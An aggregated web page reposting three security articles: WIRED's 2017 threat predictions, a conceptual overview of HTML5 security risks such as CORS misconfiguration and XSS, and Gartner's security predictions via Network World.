WHETHER IT WAS a billion compromised Yahoo accounts or state-sponsored Russian hackers muscling in on the US election, this past year saw hacks of unprecedented scale and temerity. And if history is any guide, next year should yield more of the same.

It’s hard to know for certain what lies ahead, but some themes began to present themselves toward the end of 2016 that will almost certainly continue well into next year. And the more we can anticipate them, the better we can prepare. Here’s what we think 2017 will hold.

Consumer Drones Get Weaponized

Given how frequently the US has used massive flying robots to kill people, perhaps it’s no surprise that smaller drones are now turning deadly, too—this time in the hands of America’s enemies. In October the New York Times reportedthat in the first known case, US-allied Kurdish soldiers were killed by a small drone the size of a model airplane, rigged with explosives. As drones become smaller, cheaper, and more powerful, the next year will see that experiment widened into a full-blown tactic for guerrilla warfare and terrorism. What better way to deliver deadly ordnance across enemy lines or into secure zones of cities than with remote-controlled accuracy and off-the-shelf hardware that offers no easy way to trace the perpetrator? The US government is already buying drone-jamming hardware. But as with all IEDs, the arms race between flying consumer grade bombs and the defenses against them will likely be a violent game of cat-and-mouse.

Another iPhone Encryption Clash

When the FBI earlier this year demanded that Apple write new software to help crack its own device—the iPhone 5c of dead San Bernadino terrorist Rizwan Farook—it fired the first shots in a new chapter of the decades-long war between law enforcement and encryption. And when it backed off that request, saying it had found its own technique to crack the phone, it only delayed any resolution. It’s only a matter of time until the FBI or other cops make another legal demand that an encryption-maker assist in cracking its protections for users, setting the conflict in motion again. In fact, in October the FBI revealed in October that another ISIS-linked terrorist, the man who stabbed ten people in a Minnesota mall, used an iPhone. Depending on what model iPhone it is, that locked device could spark Apple vs. FBI, round two, if the bureau is determined enough to access the terrorist’s data. (It took three months after the San Bernadino attack for the FBI’s conflict with Apple to become public, and that window hasn’t passed in the Minnesota case.) Sooner or later, expect another crypto clash.

Russian Hackers Run Amok

Two months have passed since the Office of the Director of National Intelligence and the Department of Homeland Security stated what most of the private sector cybersecurity world already believed: That the Kremlin hacked the American election, breaching the Democratic National Committee and Democratic Congressional Campaign Committee and spilling their guts to WikiLeaks. Since then, the White House has promised a response to put Russia back in check, but none has surfaced. And with less than a month until the inauguration of Putin’s preferred candidate—one who has buddied up to the Russian government at every opportunity and promised to weaken America’s NATO commitments—any deterrent effect of a retaliation would be temporary at best. In fact, the apparent success of Russia’s efforts—if, as CIA and FBI officials have now both told the Washington Post, Trump’s election was the hackers’ goal—will only embolden Russia’s digital intruders to try new targets and techniques. Expect them to replicate their influence operations ahead of elections next year in Germany, the Netherlands, and France, and potentially to even try new tricks like data sabotage or attacks on physical infrastructure.

A Growing Rift Between the President and the Intelligence Community

Though the US intelligence community—including the FBI, NSA, and CIA—has unanimously attributed multiple incidents of political hacking to Russian government-sponsored attackers, President-elect Donald Trump has remained skeptical. Furthermore, he has repeatedly cast doubt on digital forensics as an intelligence discipline, saying things like, “Once they hack, if you don’t catch them in the act you’re not going to catch them. They have no idea if it’s Russia or China or somebody.” Trump has also caused a stir by declining daily intelligence briefings. Beyond just the current situation with Russia, Trump’s casual dismissal of intelligence agency findings is creating an unprecedented dissonance between the Office of the President and the groups that bring it vital information about the world. Current and former members of the intelligence community told WIRED in mid-December that they find Trump’s attitude disturbing and deeply concerning. If the President-elect permanently adopts this posture, it could irrevocably hinder the role of intelligence agencies in government. President Obama, for one, says he is hopeful that the situation is temporary, since Trump has not yet felt the full responsibility of the presidency. “I think there is a sobering process when you walk into the Oval Office,” Obama said recently in a press conference. “There is just a whole different attitude and vibe when you’re not in power as when you are in power.” If Trump does eventually embrace the intelligence community more fully, the next question will be whether it can move on from what has already transpired.

DDoS Attacks Will Crash the Internet Again (And Again, And Again)

This was the year of Internet of Things botnets, in which malware infects inconspicuous devices like routers and DVRs and then coordinates them to overwhelm an online target with a glut of internet traffic, in what’s known as a disrupted denial of service attack (DDoS). Botnets have traditionally been built with compromised PCs, but poor IoT security has made embedded devices an appealing next frontier for hackers, who have been building massive IoT botnets. The most well-known example in 2016, called Mirai, was used this fall to attack and temporarily bring down individual websites, but was also turned on Internet Service Providers and internet-backbone companies, causing connectivity interruptions around the world. DDoS attacks are used by script kiddies and nation states alike, and as long as the pool of unsecured computing devices endlessly grows, a diverse array of attackers will have no disincentive from turning their DDoS cannons on internet infrastructure. And it’s not just internet connectivity itself. Hackers already used a DDoS attack to knock out central heating in some buildings in Finland in November. The versatility of DDoS attacks is precisely what makes them so dangerous. In 2017, they’ll be more prevalent than ever.

Ransomware Expands Its Targets

Ransomware attacks have become a billion-dollar business for cybercriminals and are on the rise for individuals and institutions alike. Attackers already use ransomware to extort money from hospitals and corporations that need to regain control of their systems quickly, and the more success attackers have, the more they are willing to invest in development of new techniques. A recent ransomware version called Popcorn Time, for example, was experimenting with offering victims an alternative to paying up—if they could successfully infect two other devices with the ransomware. And more innovation, plus more disruption, will come in 2017. Ransomware attacks on financial firms have already been rising, and attackers may be emboldened to take on large banks and central financial institutions. And IoT ransomware could crop up in 2017, too. It may not make sense for a surveillance camera, which might not even have an interface for users to pay the ransom, but could be effective for devices that sync with smartphones or tie in to a corporate network. Attackers could also demand money in exchange for ceasing an IoT botnet-driven DDoS attack. In other words, ransomware attacks are going to get bigger in every possible sense of the word.

Author: WIRED STAFF
Source: https://www.wired.com/2017/01/biggest-security-threats-coming-2017

Categorized in Internet Privacy

Over the past few years, there have been a lot of changes affecting the key technologies that power the internet.

HTML is the dominant web language and its new version, HTML5 provides impressive web enhancements for new web applications.

However, when this fifth version of HTML was released way back 2014, it became really popular to web and app developers, the issues surrounding its internet security risks also take hold.

Just like every new technology, HTML5 is bound to have defects and pitfalls. Internet security experts and commenters had also predicted this, long before its release.

HTML5 AND ITS IMPORTANCE

HTML5 is the 5th revision of the HTML standard developed by W3C. While it was approved as a standard in October 2014, its adoption began several years earlier.

This language mainly describes the contents and appearance of web pages. Due to its many new features, it makes web pages more interactive and dynamic.

Among these features include messaging enhancements, new parsing rules to enhance flexibility, elimination of redundant attributes and native multimedia support.

W3C developed HTML5 mainly to address the compatibility issues with the previous HTML version.

The main reasons why this version has become so popular is the essential elimination of browser plugins, reduction of web development time and mobile friendliness.

HTML5 is also supported by all the authority browser vendors including Google, Apple, Opera, Microsoft, and Firefox.

THE INTERNET SECURITY RISKS ASSOCIATED WIH HTML5

html5

As HTML5 approved as a standard in 2014 becomes more popular among developers, it introduces new internet security threat due to the new features and attribute.

As HTML5 becomes adopted on a very large scale with a large percentage of browsers. Mobile applications are now based on this language.

It is also important for developers and users to know about the internet security risks involved in order to be able to tackle them.

The security problems that affected the older version are still present.

More importantly, the new features in HTML5 present further internet security issues.

Below are some of the attacks made possible by HTML5.

1. CROSS ORIGIN RESOURCE SHARING (CORS ATTACK)

Cross-Origin Resource Sharing (CORS) is a feature that allows a resource to gain access to data from domains outside itself.

Using this feature, web pages can load resources including scripts, CSS style sheets, and images from different domains.

As such, a remote cyber attacker can inject codes on the web pages.

An API called XMLHttpRequest makes this possible. Basically, this is an API that facilitates the transfer of data between a server and a client.

Before the introduction of HTML5, a site could not make direct requests to another site using this API.

Now, HTTP requests can be made, provided the requested sites grants permission.

This is the point where vulnerability that can be exploited. Access can be granted through the following header in the responses; Access-Control-Allow-Origin.

If a website has wrongly defined this header or based on a wrong assumption, access control can easily be bypassed.

A similar threat called Cross-Site-Request-Forgery (CSRF) was present in HTML4. However, with HTML5 this is possible without user interaction.

 

2. HTML5 TAG ABUSE

The new attributes and tags introduced by HTML5 present in an internet security threats to cross-site scripting attacks. XSS attacks where attackers run malicious scripts through unencoded or unvalidated user inputs have been around for a while.

Developers often avoid them by filtering user inputs. This is basically not allowing users to input certain character sequences.

Some of the new attributes and tags in HTML5 can be employed to run scripts by bypassing input filters. With HTML5, any object can associate itself with any form regardless of its position on the web page.

This can be exploited for malicious purposes. Attackers can also modify web page forms using attributes in HTML5 such as formaction, fromenctype, formmetod, form target and formnonvalidate.

3. LOCAL STORAGE

Prior to HTML5, browser data was stored through web cookies. The local storage feature in HTML5 was developed to improve internet security and enable storage of more web data.

It allows browsers to store and delete data based on name-value pairs. The good news is that the origin-specific, meaning sites from different origins cannot access applications on local databases.

 

Unfortunately, it is vulnerable to the aforementioned XSS attacks.

XSS flaws resulting from developer errors, this can allow the execution of JavaScript codes leading them to the access of local variables.

Attackers can also redirect target site requests to different sites using DNS cache poisoning.

There are other internet security issues with HTML5 including Cross Document Messaging, Offline Web Applications, and the middleware framework.

Most of these internet security problems fall into the hands of the web developers.

As such, they can be mitigated by safe coding practices, regular code testing, education on the possible internet security threats, data sanitization and access restriction for untrusted code.

Source:  darkwebnews.com

Categorized in Science & Tech

Watch out for weak in-house code, data in the cloud and the Internet of things 

Forward looking IT security pros need to better address known risks, monitor closely the value of shadow IT devices and solve the inherent weaknesses introduced by the internet of things, Gartner says.

The consulting firm has taken a look at five key areas of security concern that businesses face this year and issued predictions on and recommendations about protecting networks and data from threats that will likely arise in each.

The areas are threat and vulnerability management, application and data security, network and mobile security, identity and access management, and Internet of Things security. Gartner’s findings were revealed at its recent Security and Risk Management Summit by analyst Earl Perkins.

One overriding recommendation is that businesses must be aware that delaying security measures in an effort to avoid disrupting business can be a false economy.

He recommends that security pros should make decisions about protecting networks and resources based on the range of risks that known weaknesses represent to the business and its goals. Rather than thinking about their role purely as protecting, they should look at it as facilitating successful business outcomes. 

Here are the predictions and recommendations:

Threat and vulnerability management

Prediction: “Through 2020, 99% of vulnerabilities exploited will continue to be ones known by security and IT professionals for at least one year.”

With attackers looking for vulnerabilities in applications as well as exploitable configurations, it’s important for businesses to patch vulnerabilities in a timely fashion. If they don’t, they stand to lose money through damage to systems and theft of data.

Prediction: “By 2020, a third of successful attacks experienced by enterprises will be on their shadow IT resources.”

An area of growing concern is the introduction of new technologies by business units without vetting by the security team, Perkins says. Avoiding that review and the fact that many of these technologies are new and still contain vulnerabilities makes them susceptible to attacks.

Application and data security

Prediction: “By 2018, the need to prevent data breaches from public clouds will drive 20% of organizations to develop data security governance programs.”

Data security governance will be promoted by insurance companies that will set cyber premiums based on whether businesses have these programs in place. 

Prediction: “By 2020, 40% of enterprises engaged in DevOps will secure developed applications by adopting application security self-testing, self-diagnosing and self-protection technologies.”

Here Perkins looks to maturing technology called runtime application self-protection (RASP) as a way to avoid vulnerabilities in applications that might result from problems overlooked due to the rapid pace at which DevOps teams work. RASP does its work rapidly and accurately to provide protection against vulnerabilities that might be exploited, he says.

Network and Mobile Security

Prediction: “By 2020, 80% of new deals for cloud-based cloud-access security brokers (CASB) will be packaged with network firewall, secure web gateway (SWG) and web application firewall (WAF) platforms.”

Vendors of traditional network security products such as firewalls, SWGs and WAFs want to be in on their customers protecting their SaaS applications, which is effectively accomplished via CASBs, he says. Businesses should evaluate whether CASB services are warranted based on their plans for application deployment, and should consider offers by their current vendors of these traditional technologies, he says.

Identity and Access Management

Prediction: “By 2019, 40% of identity as a service (IDaaS) implementations will replace on-premises IAM implementations, up from 10% today.”

This increase in use of IDaaS will in part stem from the difficulty and expense of running on-premises IAM infrastructure, and the growing use of other something-as-a-service offerings will make the decision more comfortable. The ongoing introduction of more and more Web and mobile applications will create a natural opportunity for the transition from in-house IAM to IDaaS, he says. 

Prediction: “By 2019, use of passwords and tokens in medium-risk use cases will drop 55%, due to the introduction of recognition technologies.”

With the cost and accuracy of biometrics, they become a good option for continuously authenticating. In combination with use-r and entity-behavior analysis, this technology can make a difference when applied to cases that call for a medium level of trust, Perkins says.

Security for the internet of things (IoT)

Prediction: “Through 2018, over 50% of IoT device manufacturers will not be able to address threats from weak authentication practices.”

IoT devices are still being made without much consideration being given to security, and yet some are located in networks so that, if exploited, they could expose networks to harm and data to breaches, Perkins says. Businesses need a framework for determining the risks each IoT device type represents and the appropriate controls for dealing with them.

Prediction: “By 2020, more than 25% of identified enterprise attacks will involve IoT, though IoT will account for only 10% of IT security budgets.”

Since security pros won’t be able to determine the importance that IoT devices represent to the organization, the business unit that uses them should determine what risk they represent. Security pros should set aside 5% to 10% of IT security spending for monitoring and protecting these devices as needed, he says.

Source  : http://www.networkworld.com/article/3088084/security/gartner-s-top-10-security-predictions.html

Categorized in Internet Privacy

airs logo

Association of Internet Research Specialists is the world's leading community for the Internet Research Specialist and provide a Unified Platform that delivers, Education, Training and Certification for Online Research.

Get Exclusive Research Tips in Your Inbox

Receive Great tips via email, enter your email to Subscribe.

Follow Us on Social Media

Book Your Seat for Webinar GET FREE REGISTRATION FOR MEMBERS ONLY      Register Now